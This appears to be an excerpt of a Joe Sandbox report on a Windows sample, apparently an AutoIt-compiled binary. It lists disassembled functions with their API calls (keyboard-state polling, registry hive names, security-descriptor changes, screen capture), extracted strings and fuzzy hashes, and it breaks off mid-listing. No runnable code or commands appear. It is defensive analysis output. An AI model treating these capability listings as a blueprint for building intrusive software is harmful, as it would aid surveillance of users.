                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 2733774712-3457252023
                                                            • Opcode ID: ef58b0b8a9b7b253417faa4c037f44d9f089843d7a3a96688f4b623dbdc337b5
                                                            • Instruction ID: 75d6902646c5d6a9ba82b3c9db3a2272bbfb4058767e55a50a04144cf1093241
                                                            • Opcode Fuzzy Hash: ef58b0b8a9b7b253417faa4c037f44d9f089843d7a3a96688f4b623dbdc337b5
                                                            • Instruction Fuzzy Hash: B831B0B2500109ABDB259FA4DC49FEF77BCFF88701F1440B6FA08D2165E77496448B65
                                                            Function 0087DB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __wsplitpath.LIBCMT ref: 0087DC7B
                                                            • _wcscat.LIBCMT ref: 0087DC93
                                                            • _wcscat.LIBCMT ref: 0087DCA5
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0087DCBA
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0087DCCE
                                                            • GetFileAttributesW.KERNEL32(?), ref: 0087DCE6
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 0087DD00
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0087DD12
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                            • String ID: *.*
                                                            • API String ID: 34673085-438819550
                                                            • Opcode ID: 159d78dd08d4d45470d71c0bd9b6dba348881d913e4e67673031fc8e76956a19
                                                            • Instruction ID: d3ba40494e1ae32c2097f3088cbdde36d110b3faebf11fda327cf59153b887b0
                                                            • Opcode Fuzzy Hash: 159d78dd08d4d45470d71c0bd9b6dba348881d913e4e67673031fc8e76956a19
                                                            • Instruction Fuzzy Hash: CB816E715043459FCB24EF28C8859AAB7F8FF89314F19C82AF889C7255E770E984CB52
                                                            Function 0089C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00812612: GetWindowLongW.USER32(?,000000EB), ref: 00812623
                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0089C4EC
                                                            • GetFocus.USER32 ref: 0089C4FC
                                                            • GetDlgCtrlID.USER32(00000000), ref: 0089C507
                                                            • _memset.LIBCMT ref: 0089C632
                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0089C65D
                                                            • GetMenuItemCount.USER32(?), ref: 0089C67D
                                                            • GetMenuItemID.USER32(?,00000000), ref: 0089C690
                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0089C6C4
                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0089C70C
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0089C744
                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0089C779
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                            • String ID: 0
                                                            • API String ID: 1296962147-4108050209
                                                            • Opcode ID: 4cce61e8f208e6ad51fb2bed7c214446b0ae7ef90a2a2fb055a2177024d63e90
                                                            • Instruction ID: 22c4ee02e872efd09073cc4df0af443b36a9669b5e83c5e443643ff0376dbf37
                                                            • Opcode Fuzzy Hash: 4cce61e8f208e6ad51fb2bed7c214446b0ae7ef90a2a2fb055a2177024d63e90
                                                            • Instruction Fuzzy Hash: C2818E70208305AFDB11EF58C984A6BBBE8FB98314F18492EF995D7291D731D905CBA2
                                                            Function 008683F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0086874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00868766
                                                              • Part of subcall function 0086874A: GetLastError.KERNEL32(?,0086822A,?,?,?), ref: 00868770
                                                              • Part of subcall function 0086874A: GetProcessHeap.KERNEL32(00000008,?,?,0086822A,?,?,?), ref: 0086877F
                                                              • Part of subcall function 0086874A: HeapAlloc.KERNEL32(00000000,?,0086822A,?,?,?), ref: 00868786
                                                              • Part of subcall function 0086874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0086879D
                                                              • Part of subcall function 008687E7: GetProcessHeap.KERNEL32(00000008,00868240,00000000,00000000,?,00868240,?), ref: 008687F3
                                                              • Part of subcall function 008687E7: HeapAlloc.KERNEL32(00000000,?,00868240,?), ref: 008687FA
                                                              • Part of subcall function 008687E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00868240,?), ref: 0086880B
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00868458
                                                            • _memset.LIBCMT ref: 0086846D
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0086848C
                                                            • GetLengthSid.ADVAPI32(?), ref: 0086849D
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 008684DA
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008684F6
                                                            • GetLengthSid.ADVAPI32(?), ref: 00868513
                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00868522
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00868529
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0086854A
                                                            • CopySid.ADVAPI32(00000000), ref: 00868551
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00868582
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008685A8
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008685BC
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                            • String ID:
                                                            • API String ID: 3996160137-0
                                                            • Opcode ID: 8068438c27fd5be81ce226e83ebac920ade0aa86aabb2a542ff8e459a450edbf
                                                            • Instruction ID: bb7f7d400e268df3607553fb368fc68d815d9bf2952d546dcdc59c094acd760e
                                                            • Opcode Fuzzy Hash: 8068438c27fd5be81ce226e83ebac920ade0aa86aabb2a542ff8e459a450edbf
                                                            • Instruction Fuzzy Hash: 70611A71900209EFDF14DFA4DC49AAEBBB9FF04300F14826AF919E6291DB319A15CF61
                                                            Function 0088762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 008876A2
                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 008876AE
                                                            • CreateCompatibleDC.GDI32(?), ref: 008876BA
                                                            • SelectObject.GDI32(00000000,?), ref: 008876C7
                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0088771B
                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00887757
                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0088777B
                                                            • SelectObject.GDI32(00000006,?), ref: 00887783
                                                            • DeleteObject.GDI32(?), ref: 0088778C
                                                            • DeleteDC.GDI32(00000006), ref: 00887793
                                                            • ReleaseDC.USER32(00000000,?), ref: 0088779E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                            • String ID: (
                                                            • API String ID: 2598888154-3887548279
                                                            • Opcode ID: bfc4198c8f0cebd3979555acadcece28a94a6d38bc0b0cde356c328548855617
                                                            • Instruction ID: 06f8068e9977158fd3da07c2e7591d96e8bef3effd555f4b9170a88deeef5459
                                                            • Opcode Fuzzy Hash: bfc4198c8f0cebd3979555acadcece28a94a6d38bc0b0cde356c328548855617
                                                            • Instruction Fuzzy Hash: C9513A75904609EFCB15DFA8CC85EAEBBB9FF48710F24842AEA4AD7211D731A840CB50
                                                            Function 0087A0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadStringW.USER32(00000066,?,00000FFF,0089FB78), ref: 0087A0FC
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                            • LoadStringW.USER32(?,?,00000FFF,?), ref: 0087A11E
                                                            • __swprintf.LIBCMT ref: 0087A177
                                                            • __swprintf.LIBCMT ref: 0087A190
                                                            • _wprintf.LIBCMT ref: 0087A246
                                                            • _wprintf.LIBCMT ref: 0087A264
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: LoadString__swprintf_wprintf$_memmove
                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 311963372-2391861430
                                                            • Opcode ID: 95bb865ed7b6dffddd0814f0166b3e9a92bc66d96311ad030ecdb74959b85132
                                                            • Instruction ID: 946e754f0f496dcdea684b4bc7622704495ea4b041684717ea55b3ba5d7606eb
                                                            • Opcode Fuzzy Hash: 95bb865ed7b6dffddd0814f0166b3e9a92bc66d96311ad030ecdb74959b85132
                                                            • Instruction Fuzzy Hash: B5518D31900109AACF15EBA4CD86EEEB779FF14300F104169F515F21A2EB316F98CB62
                                                            Function 00816BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00830B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00816C6C,?,00008000), ref: 00830BB7
                                                              • Part of subcall function 008148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008148A1,?,?,008137C0,?), ref: 008148CE
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00816D0D
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00816E5A
                                                              • Part of subcall function 008159CD: _wcscpy.LIBCMT ref: 00815A05
                                                              • Part of subcall function 0083387D: _iswctype.LIBCMT ref: 00833885
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                            • API String ID: 537147316-1018226102
                                                            • Opcode ID: c27b9513681131ea7e6ea7e44843553b5dd041d2bdb5f5e3b08a792891bd8a3d
                                                            • Instruction ID: 8a4e655672bce940b8387b4e16712dad46fb2a15d05fc771519f91cb56ad7ec9
                                                            • Opcode Fuzzy Hash: c27b9513681131ea7e6ea7e44843553b5dd041d2bdb5f5e3b08a792891bd8a3d
                                                            • Instruction Fuzzy Hash: 590246311083459EC724EF28C891AAEBBE9FF99354F14491DF496D72A2DB30D989CB43
                                                            Function 008145DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 008145F9
                                                            • GetMenuItemCount.USER32(008D6890), ref: 0084D7CD
                                                            • GetMenuItemCount.USER32(008D6890), ref: 0084D87D
                                                            • GetCursorPos.USER32(?), ref: 0084D8C1
                                                            • SetForegroundWindow.USER32(00000000), ref: 0084D8CA
                                                            • TrackPopupMenuEx.USER32(008D6890,00000000,?,00000000,00000000,00000000), ref: 0084D8DD
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0084D8E9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                            • String ID:
                                                            • API String ID: 2751501086-0
                                                            • Opcode ID: 619418f8da5fe897af930c83525f5677ecdcf282c773121062b28b61d9be9331
                                                            • Instruction ID: 54831a58d715562c82d86b1b2b07c9898c838adf0bfa913e86d796060dfad150
                                                            • Opcode Fuzzy Hash: 619418f8da5fe897af930c83525f5677ecdcf282c773121062b28b61d9be9331
                                                            • Instruction Fuzzy Hash: A271F470601309BBFB209F14DC45FAABF68FF05368F244216F619EA1E1C7B16850DB91
                                                            Function 008910A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00890038,?,?), ref: 008910BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                            • API String ID: 3964851224-909552448
                                                            • Opcode ID: 88e283a68e011abc325596935df0ec23afe962108ce43e8b9bc093c08ed34dac
                                                            • Instruction ID: 7885f9509b3f184c630eb9011f25c87e0f1a996fa4261e18ed2e651d72bd3c24
                                                            • Opcode Fuzzy Hash: 88e283a68e011abc325596935df0ec23afe962108ce43e8b9bc093c08ed34dac
                                                            • Instruction Fuzzy Hash: 1041473025424A9BCF10FF94D8A5AEA3778FF51300F184519E991DB292DB30A91ACBA1
                                                            Function 00875569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00817D2C: _memmove.LIBCMT ref: 00817D66
                                                              • Part of subcall function 00817A84: _memmove.LIBCMT ref: 00817B0D
                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 008755D2
                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 008755E8
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008755F9
                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0087560B
                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0087561C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: SendString$_memmove
                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                            • API String ID: 2279737902-1007645807
                                                            • Opcode ID: bf96519d87ec7e97e1b0d3409e14063cb38459e72208ddba3d61911d71cb747b
                                                            • Instruction ID: 52919c67f0f9f6d9f1c2a4f23ca98baec3431fd195736b7b620c960ae46d3e56
                                                            • Opcode Fuzzy Hash: bf96519d87ec7e97e1b0d3409e14063cb38459e72208ddba3d61911d71cb747b
                                                            • Instruction Fuzzy Hash: 0F11D0206501AD79D724A6B5DC5AEFFBB7CFF91B04F40042DB414E22D1DEB48D44C5A2
                                                            Function 008748F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 208665112-3771769585
                                                            • Opcode ID: a649761795ef1410e4bf16f7aaa92d4b9d632db4d70f0f8bf2dd284975e49da8
                                                            • Instruction ID: 49cf2f56c4aeae9b777f2480aa7af2becdb528fd83256d8ec298c13b92bc14f8
                                                            • Opcode Fuzzy Hash: a649761795ef1410e4bf16f7aaa92d4b9d632db4d70f0f8bf2dd284975e49da8
                                                            • Instruction Fuzzy Hash: FE11D831A04114ABCB28FB64DC49FDB7BBCFB41710F044176F608D6166EF74D9818692
                                                            Function 00875217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • timeGetTime.WINMM ref: 0087521C
                                                              • Part of subcall function 00830719: timeGetTime.WINMM(?,7694B400,00820FF9), ref: 0083071D
                                                            • Sleep.KERNEL32(0000000A), ref: 00875248
                                                            • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0087526C
                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0087528E
                                                            • SetActiveWindow.USER32 ref: 008752AD
                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008752BB
                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 008752DA
                                                            • Sleep.KERNEL32(000000FA), ref: 008752E5
                                                            • IsWindow.USER32 ref: 008752F1
                                                            • EndDialog.USER32(00000000), ref: 00875302
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                            • String ID: BUTTON
                                                            • API String ID: 1194449130-3405671355
                                                            • Opcode ID: 2f47881b0ceca927134cbc037d6886146377026c0bff58ebafa185f04402e06a
                                                            • Instruction ID: ca451530267d65146df10d5d36abc05a60b06e75dd1ab991d40eedf8f49de242
                                                            • Opcode Fuzzy Hash: 2f47881b0ceca927134cbc037d6886146377026c0bff58ebafa185f04402e06a
                                                            • Instruction Fuzzy Hash: C721A470205708AFE7056B60EC88B253B6AFB55346F084536F509C227AEBB1DC109A63
                                                            Function 0087D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00819997: __itow.LIBCMT ref: 008199C2
                                                              • Part of subcall function 00819997: __swprintf.LIBCMT ref: 00819A0C
                                                            • CoInitialize.OLE32(00000000), ref: 0087D855
                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0087D8E8
                                                            • SHGetDesktopFolder.SHELL32(?), ref: 0087D8FC
                                                            • CoCreateInstance.OLE32(008A2D7C,00000000,00000001,008CA89C,?), ref: 0087D948
                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0087D9B7
                                                            • CoTaskMemFree.OLE32(?,?), ref: 0087DA0F
                                                            • _memset.LIBCMT ref: 0087DA4C
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0087DA88
                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0087DAAB
                                                            • CoTaskMemFree.OLE32(00000000), ref: 0087DAB2
                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0087DAE9
                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 0087DAEB
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                            • String ID:
                                                            • API String ID: 1246142700-0
                                                            • Opcode ID: f6829c8d9c08b2c2b1a4532034ea7590ba7f302b4c2698cd127498e6d10376ab
                                                            • Instruction ID: d665f6ce7367b9f11dbbec2e777610a80b429d5b392df85439c1004233946ef3
                                                            • Opcode Fuzzy Hash: f6829c8d9c08b2c2b1a4532034ea7590ba7f302b4c2698cd127498e6d10376ab
                                                            • Instruction Fuzzy Hash: 21B10C75A00219EFDB04DFA8C898DAEBBB9FF48314B148469F549EB261DB30ED41CB51
                                                            Function 0087052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 008705A7
                                                            • SetKeyboardState.USER32(?), ref: 00870612
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00870632
                                                            • GetKeyState.USER32(000000A0), ref: 00870649
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00870678
                                                            • GetKeyState.USER32(000000A1), ref: 00870689
                                                            • GetAsyncKeyState.USER32(00000011), ref: 008706B5
                                                            • GetKeyState.USER32(00000011), ref: 008706C3
                                                            • GetAsyncKeyState.USER32(00000012), ref: 008706EC
                                                            • GetKeyState.USER32(00000012), ref: 008706FA
